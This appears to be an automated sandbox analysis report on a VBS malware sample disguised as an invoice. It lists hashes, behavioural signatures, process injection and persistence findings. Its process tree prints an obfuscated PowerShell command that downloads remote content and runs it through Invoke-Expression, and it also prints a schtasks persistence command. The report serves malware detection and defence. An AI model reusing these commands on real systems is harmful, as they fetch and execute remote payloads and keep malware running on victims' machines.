Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
18/08/2023, 13:19
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice#84398 .vbs
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
lnvoice#84398 .vbs
Resource
win10v2004-20230703-en
General
-
Target
lnvoice#84398 .vbs
-
Size
742KB
-
MD5
f5a9780ca06cfd76ac732679199669ce
-
SHA1
23d08435097e4dcc6b81f93fa01e05c9da950314
-
SHA256
e5fbda4b9b341ba504f31522dd0a204ce7c56c2ff288aba7463c7dc06a6eec36
-
SHA512
3b7a31f73eb07890bb4fd593a1373d71577022c5181636ac09b6b6b349a4b9a61d7985f8d7b2be409fbb247ea6e07bf2d4ee21f76451025a129c2fa6f7cb15a1
-
SSDEEP
48:8000000X0G35q43/ZiG6UZX1Nd3B3U43C6K3541NN+w53B464Swf3ZZNNfSmqXXT:HRC
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 3332 powershell.exe 10 3332 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kilng.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kilng.vbs powershell.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3332 set thread context of 3508 3332 powershell.exe 91 PID 3332 set thread context of 2452 3332 powershell.exe 92 PID 3332 set thread context of 3848 3332 powershell.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4676 schtasks.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3332 powershell.exe 3332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3332 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1564 wrote to memory of 3332 1564 WScript.exe 81 PID 1564 wrote to memory of 3332 1564 WScript.exe 81 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 3508 3332 powershell.exe 91 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 2452 3332 powershell.exe 92 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 3848 3332 powershell.exe 93 PID 3332 wrote to memory of 4676 3332 powershell.exe 94 PID 3332 wrote to memory of 4676 3332 powershell.exe 94
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lnvoice#84398 .vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c $((irm usabiz9s.blogspot.com/atom.xml) | .('{1}{0}'-f'MOOOT','I').replace('MOOOT','ex'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Registers COM server for autorun
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:3508
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:2452
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵PID:3848
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 187 /tn clomepe /F /tr "wscript //nologo C:\\ProgramData\\TUKHAMTASSER\\kilng.vbs"3⤵
- Creates scheduled task(s)
PID:4676
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
252B
MD521f034734cf5a764e68e655696c127e9
SHA1c12867f065b91382d9537cfbbb58d65efe62bd3e
SHA2563f9dedff42ad75ea6a7944816a5ceff216bd67bcc2175a6703787aec01b4233d
SHA512cbfcb52377907c247436ccd1e3656729d0d380784f220e1ed05c7b1d3b5d52daaa44dc90adad07836dca5c02a88a435b71d07dde9775a361d5f6975778ef5113
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82